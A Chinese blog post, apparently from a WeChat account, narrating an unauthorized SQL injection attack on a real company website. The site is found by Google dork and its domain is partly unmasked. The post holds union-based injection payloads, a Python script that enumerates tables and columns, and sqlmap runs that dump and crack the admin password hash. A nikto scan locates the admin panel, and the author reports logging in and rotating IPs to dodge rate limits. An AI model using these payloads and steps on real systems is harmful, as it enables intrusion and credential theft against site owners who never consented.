发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占有率摆在这里
通过谷歌来搜索一些存在注入漏洞的网站,用谷歌hack语法来搜索:公司inurl:".php?id="
结尾为公司,url中带有.php?id=的网页 那么我们来搜索下,我们就选择第一个
先加一个’测试一下,网页直接报错,从报错信息来看,是一个linux服务器,mysql的数据库
使用hackbar插件继续测试,不报错 继续测试,报错,说明这个字段是一个整型数据
?id=37 and '1'='1'
为什么说是整型数据呢? 因为假设它是字符型的数据,那么sql语句结尾必定是’符号,那么此时语句应该是这样的,那么报错
select * from 表 where id='37 and '1'='1''
若是整型数据,就是这样子的,那么不会报错,所以这个字段是整型的
select * from 表 where id=37 and '1'='1'
那么这是存在整型的注入点,继续测试
使用order by语句排序来判断当前表的字段数,总共25不报错,26报错,当前表为25个字段
使用union联合查询,判断信息输出位置,输出的是2和10
and 1=2 每次都需要加是因为需要将前面的sql语句为假,那么则执行后面的sql语句
?id=37 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
替换2,和10的位置为database(),和user(),页面输出数据库名称和账号名和地址信息,database为bdm266490221_db
此时我们就可以使用mysql自带的information_schema库来查询信息了
?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA='bdm266490221_db' limit 0,1
发现报错了,很可能屏蔽了’号,那么我们可以将其转化成十六进制数
再来!
?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA=0x2762646d3236363439303232315f646227 limit 0,1
依旧没有显示出来,这个地方有两点值得注意
1.可能不支持’"等符号,那么使用0x 十六进制的方法
2.可能sql语句后接了一些其他的语句,那么使用 – 来注释那些语句,这样就可以使用limit 0,1输出指定信息
现在这样子就是没法使用where精确的查找出bdm266490221_db库的所有表名了,那么我换一种方法,直接用脚本列举出所有的表名和对应的db库
使用python构造所有url,请求然后正则匹配需要的信息
and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit 0,1
for i in range(0,1000):
try:
url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit %d,%d"""%(i,i+1)
rsp = requests.get(url=url).text
info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)',rsp)
print(info,i)
except:
print('error:%d'%i)
[('information_schema', ''), ('', 'CHARACTER_SETS')] 0
[('information_schema', ''), ('', 'COLLATIONS')] 1
[('information_schema', ''), ('', 'COLLATION_CHARACTER_SET_APPLICABILITY')] 2
[('information_schema', ''), ('', 'COLUMNS')] 3
[('information_schema', ''), ('', 'COLUMN_PRIVILEGES')] 4
[('information_schema', ''), ('', 'ENGINES')] 5
[('information_schema', ''), ('', 'EVENTS')] 6
[('information_schema', ''), ('', 'FILES')] 7
[('information_schema', ''), ('', 'GLOBAL_STATUS')] 8
[('information_schema', ''), ('', 'GLOBAL_VARIABLES')] 9
[('information_schema', ''), ('', 'KEY_COLUMN_USAGE')] 10
[('information_schema', ''), ('', 'PARTITIONS')] 11
[('information_schema', ''), ('', 'PLUGINS')] 12
[('information_schema', ''), ('', 'PROCESSLIST')] 13
[('information_schema', ''), ('', 'PROFILING')] 14
[('information_schema', ''), ('', 'REFERENTIAL_CONSTRAINTS')] 15
[('information_schema', ''), ('', 'ROUTINES')] 16
[('information_schema', ''), ('', 'SCHEMATA')] 17
[('information_schema', ''), ('', 'SCHEMA_PRIVILEGES')] 18
[('information_schema', ''), ('', 'SESSION_STATUS')] 19
[('information_schema', ''), ('', 'SESSION_VARIABLES')] 20
[('information_schema', ''), ('', 'STATISTICS')] 21
[('information_schema', ''), ('', 'TABLES')] 22
[('information_schema', ''), ('', 'TABLE_CONSTRAINTS')] 23
[('information_schema', ''), ('', 'TABLE_PRIVILEGES')] 24
[('information_schema', ''), ('', 'TRIGGERS')] 25
[('information_schema', ''), ('', 'USER_PRIVILEGES')] 26
[('information_schema', ''), ('', 'VIEWS')] 27
[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36
[('', ''), ('', '')] 37
[('', ''), ('', '')] 38
可以看到bdm266490221_db存在的表,user这个可能是存放用户的账号密码的表,那么再查询下它的字段,依旧使用脚本列举
[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36
继续列举表字段,直接查询字段名
and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit 0,1
for i in range(0,1000):
try:
url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit %d,%d"""%(i,i+1)
rsp = requests.get(url=url).text
info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)',rsp)
print(info,i)
except:
print('error:%d'%i)
[('id', ''), ('', 'gplat_book')] 315
[('ip', ''), ('', 'gplat_book')] 316
[('title', ''), ('', 'gplat_book')] 317
[('content', ''), ('', 'gplat_book')] 318
[('times', ''), ('', 'gplat_book')] 319
[('stick', ''), ('', 'gplat_book')] 320
[('class', ''), ('', 'gplat_book')] 321
[('name', ''), ('', 'gplat_book')] 322
[('up_time', ''), ('', 'gplat_book')] 323
[('view', ''), ('', 'gplat_book')] 324
[('photo', ''), ('', 'gplat_book')] 325
[('email', ''), ('', 'gplat_book')] 326
[('userid', ''), ('', 'gplat_book')] 327
[('fid', ''), ('', 'gplat_book')] 328
[('id', ''), ('', 'gplat_news')] 329
[('title', ''), ('', 'gplat_news')] 330
[('path', ''), ('', 'gplat_news')] 331
[('class', ''), ('', 'gplat_news')] 332
[('sticky', ''), ('', 'gplat_news')] 333
[('times', ''), ('', 'gplat_news')] 334
[('clickNum', ''), ('', 'gplat_news')] 335
[('author', ''), ('', 'gplat_news')] 336
[('cchu', ''), ('', 'gplat_news')] 337
[('content', ''), ('', 'gplat_news')] 338
[('introduce', ''), ('', 'gplat_news')] 339
[('img', ''), ('', 'gplat_news')] 340
[('TitleFontColor', ''), ('', 'gplat_news')] 341
[('TitleFontType', ''), ('', 'gplat_news')] 342
[('issystem', ''), ('', 'gplat_news')] 343
[('classIndex', ''), ('', 'gplat_news')] 344
[('bigimg', ''), ('', 'gplat_news')] 345
[('views', ''), ('', 'gplat_news')] 346
[('url', ''), ('', 'gplat_news')] 347
[('files', ''), ('', 'gplat_news')] 348
[('seo_title', ''), ('', 'gplat_news')] 349
[('seo_description', ''), ('', 'gplat_news')] 350
[('seo_keywords', ''), ('', 'gplat_news')] 351
[('sort', ''), ('', 'gplat_news')] 352
[('indexview', ''), ('', 'gplat_news')] 353
[('id', ''), ('', 'gplat_newsclass')] 354
[('name', ''), ('', 'gplat_newsclass')] 355
[('href', ''), ('', 'gplat_newsclass')] 356
[('classIndex', ''), ('', 'gplat_newsclass')] 357
[('issystem', ''), ('', 'gplat_newsclass')] 358
[('id', ''), ('', 'gplat_newsclass2')] 359
[('fid', ''), ('', 'gplat_newsclass2')] 360
[('name', ''), ('', 'gplat_newsclass2')] 361
[('num', ''), ('', 'gplat_newsclass2')] 362
[('classIndex', ''), ('', 'gplat_newsclass2')] 363
[('issystem', ''), ('', 'gplat_newsclass2')] 364
[('id', ''), ('', 'href')] 365
[('title', ''), ('', 'href')] 366
[('href', ''), ('', 'href')] 367
[('img', ''), ('', 'href')] 368
[('href_img', ''), ('', 'href')] 369
[('href_order', ''), ('', 'href')] 370
[('id', ''), ('', 'job')] 371
[('ip', ''), ('', 'job')] 372
[('title', ''), ('', 'job')] 373
[('content', ''), ('', 'job')] 374
[('times', ''), ('', 'job')] 375
[('stick', ''), ('', 'job')] 376
[('class_id', ''), ('', 'job')] 377
[('name', ''), ('', 'job')] 378
[('up_time', ''), ('', 'job')] 379
[('view', ''), ('', 'job')] 380
[('photo', ''), ('', 'job')] 381
[('email', ''), ('', 'job')] 382
[('id', ''), ('', 'job_add')] 383
[('ip', ''), ('', 'job_add')] 384
[('title', ''), ('', 'job_add')] 385
[('content', ''), ('', 'job_add')] 386
[('times', ''), ('', 'job_add')] 387
[('stick', ''), ('', 'job_add')] 388
[('class_id', ''), ('', 'job_add')] 389
[('name', ''), ('', 'job_add')] 390
[('up_time', ''), ('', 'job_add')] 391
[('view', ''), ('', 'job_add')] 392
[('telephone', ''), ('', 'job_add')] 393
[('email', ''), ('', 'job_add')] 394
[('sex', ''), ('', 'job_add')] 395
[('birthday', ''), ('', 'job_add')] 396
[('marry', ''), ('', 'job_add')] 397
[('school', ''), ('', 'job_add')] 398
[('studydegree', ''), ('', 'job_add')] 399
[('specialty', ''), ('', 'job_add')] 400
[('gradyear', ''), ('', 'job_add')] 401
[('address', ''), ('', 'job_add')] 402
[('resumes', ''), ('', 'job_add')] 403
[('id', ''), ('', 'lawyer_wenda')] 404
[('ip', ''), ('', 'lawyer_wenda')] 405
[('title', ''), ('', 'lawyer_wenda')] 406
[('content', ''), ('', 'lawyer_wenda')] 407
[('times', ''), ('', 'lawyer_wenda')] 408
[('stick', ''), ('', 'lawyer_wenda')] 409
[('class_id', ''), ('', 'lawyer_wenda')] 410
[('name', ''), ('', 'lawyer_wenda')] 411
[('up_time', ''), ('', 'lawyer_wenda')] 412
[('view', ''), ('', 'lawyer_wenda')] 413
[('photo', ''), ('', 'lawyer_wenda')] 414
[('email', ''), ('', 'lawyer_wenda')] 415
[('company', ''), ('', 'lawyer_wenda')] 416
[('address', ''), ('', 'lawyer_wenda')] 417
[('answer', ''), ('', 'lawyer_wenda')] 418
[('id', ''), ('', 'user')] 419
[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
[('email', ''), ('', 'user')] 422
[('phone', ''), ('', 'user')] 423
[('times', ''), ('', 'user')] 424
[('up_time', ''), ('', 'user')] 425
[('xingb', ''), ('', 'user')] 426
[('adder', ''), ('', 'user')] 427
[('qianming', ''), ('', 'user')] 428
[('image', ''), ('', 'user')] 429
[('grade', ''), ('', 'user')] 430
[('admin', ''), ('', 'user')] 431
可以看到name,和pass很可能是账号密码,那么再使用页面构造sql来注入
[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
?id=37 and 1=2 union select 1,name,3,4,5,6,7,8,9,pass,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from bdm266490221_db.user
页面则输出信息admin和一串加密的密码,这串密码不知道什么加密的,之后用sqlmap自动破解了,密码为123321,所以这个应该是存在一个后台管理页面的账号为admin,密码为123321
既然有账号密码,那么应该是由一个管理地址,使用nikto -h url来扫描一下信息,看能不能出点什么信息
root@MiWiFi-R3L-srv:~# nikto -h http://www.***.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 60.205.33.**
+ Target Hostname: www.***.com
+ Target Port: 80
+ Start Time: 2019-05-28 16:24:58 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 12 item(s) reported on remote host
+ End Time: 2019-05-28 16:27:50 (GMT8) (172 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
扫出来了可能是后台地址的路径,尝试了一下是管理地址,使用账号密码进入后就是想办法拿到webshell了,还是不能随便去搞破坏,怪不得别人说渗透学的好,牢房蹲到老
这个网站对同一个公网ip的多次访问做了限制,一段时间会无法访问,所以我测试就不停的更换ip…
关注“码点小干货”公众号,一起分享一起交流各类信息技术和工具资源
愿你眼中总有光芒! - 愿你活成想要的样子!
公众号回复hackbar获取谷歌插件,方便sql注入的测试,不然使用网页URL栏的输入非常麻烦,因为每次符号都会被转码,嘿嘿
之后使用sqlmap做了一次扫描结果一致
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://mt.com/about.php?id=37 --dbs --delay 0.5
___
__H__
___ ___[(]_____ ___ ___ {1.3.5.142#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:10:16 /2019-05-28/
[16:10:16] [INFO] resuming back-end DBMS 'mysql'
[16:10:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:10:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:10:17] [INFO] fetching database names
[16:10:17] [INFO] used SQL query returns 2 entries
[16:10:17] [INFO] resumed: 'information_schema'
[16:10:17] [INFO] resumed: 'bdm266490221_db'
available databases [2]:
[*] bdm266490221_db
[*] information_schema
[16:10:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'
[*] ending @ 16:10:17 /2019-05-28/
于是爆出了两个数据库名
available databases [2]:
[*] bdm266490221_db
[*] information_schema
2.再尝试爆表名,当我们知道了数据库名,那么直接指定数据库名
python sqlmap.py -u http://www.**.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
___
__H__
___ ___["]_____ ___ ___ {1.3.5.142#dev}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:12:48 /2019-05-28/
[16:12:48] [INFO] resuming back-end DBMS 'mysql'
[16:12:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:12:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:12:49] [INFO] fetching tables for database: 'bdm266490221_db'
[16:12:49] [INFO] used SQL query returns 9 entries
[16:12:49] [INFO] resumed: 'gplat_book'
[16:12:49] [INFO] resumed: 'gplat_news'
[16:12:49] [INFO] resumed: 'gplat_newsclass'
[16:12:49] [INFO] resumed: 'gplat_newsclass2'
[16:12:49] [INFO] resumed: 'href'
[16:12:49] [INFO] resumed: 'job'
[16:12:49] [INFO] resumed: 'job_add'
[16:12:49] [INFO] resumed: 'lawyer_wenda'
[16:12:49] [INFO] resumed: 'user'
Database: bdm266490221_db
[9 tables]
+------------------+
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda |
+------------------+
[16:12:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y***.com'
[*] ending @ 16:12:49 /2019-05-28/
爆出了9个表名,那么看名字应该就是user表了
3.爆字段
python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
___
__H__
___ ___[.]_____ ___ ___ {1.3.5.142#dev}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:15:39 /2019-05-28/
[16:15:39] [INFO] resuming back-end DBMS 'mysql'
[16:15:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:15:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:15:40] [INFO] fetching columns for table 'user' in database 'bdm266490221_db'
[16:15:40] [INFO] used SQL query returns 13 entries
[16:15:40] [INFO] resumed: 'id','int(6)'
[16:15:40] [INFO] resumed: 'name','varchar(60)'
[16:15:40] [INFO] resumed: 'pass','varchar(60)'
[16:15:40] [INFO] resumed: 'email','varchar(60)'
[16:15:40] [INFO] resumed: 'phone','varchar(14)'
[16:15:40] [INFO] resumed: 'times','datetime'
[16:15:40] [INFO] resumed: 'up_time','datetime'
[16:15:40] [INFO] resumed: 'xingb','varchar(2)'
[16:15:40] [INFO] resumed: 'adder','varchar(8)'
[16:15:40] [INFO] resumed: 'qianming','varchar(100)'
[16:15:40] [INFO] resumed: 'image','varchar(70)'
[16:15:40] [INFO] resumed: 'grade','varchar(12)'
[16:15:40] [INFO] resumed: 'admin','int(2)'
Database: bdm266490221_db
Table: user
[13 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| adder | varchar(8) |
| admin | int(2) |
| email | varchar(60) |
| grade | varchar(12) |
| id | int(6) |
| image | varchar(70) |
| name | varchar(60) |
| pass | varchar(60) |
| phone | varchar(14) |
| qianming | varchar(100) |
| times | datetime |
| up_time | datetime |
| xingb | varchar(2) |
+----------+--------------+
[16:15:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y**mt.com'
[*] ending @ 16:15:40 /2019-05-28/
4.爆内容,看起来user和pass像是账号密码
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user -C "user,pass" --dump --delay 0.5
___
__H__
___ ___[)]_____ ___ ___ {1.3.5.142#dev}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:18:43 /2019-05-28/
[16:18:43] [INFO] resuming back-end DBMS 'mysql'
[16:18:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 2853=2853
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:18:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:18:44] [INFO] fetching entries of column(s) '`user`, pass' for table 'user' in database 'bdm266490221_db'
[16:18:44] [INFO] used SQL query returns 1 entry
[16:18:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:18:45] [INFO] fetching number of column(s) '`user`, pass' entries for table 'user' in database 'bdm266490221_db'
[16:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:18:45] [INFO] retrieved: 1
[16:18:48] [INFO] retrieved:
[16:18:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:19:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[16:19:09] [INFO] retrieved: 4d9012b4a77a9524d675dad27c3276ab5705e5e8
[16:22:07] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:22:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapvAfQDC24962/sqlmaphashes-9Y2NbI.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:22:45] [INFO] using hash method 'sha1_generic_passwd'
[16:22:45] [INFO] resuming password '123321' for hash '4d9012b4a77a9524d675dad27c3276ab5705e5e8'
Database: bdm266490221_db
Table: user
[1 entry]
+---------+---------------------------------------------------+
| user | pass |
+---------+---------------------------------------------------+
| <blank> | 4d9012b4a77a9524d675dad27c3276ab5705e5e8 (123321) |
+---------+---------------------------------------------------+
[16:22:45] [INFO] table 'bdm266490221_db.`user`' dumped to CSV file '/root/.sqlmap/output/www.****.com/dump/bdm266490221_db/user.csv'
[16:22:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.***.com'
[*] ending @ 16:22:45 /2019-05-28/
共有条评论 网友评论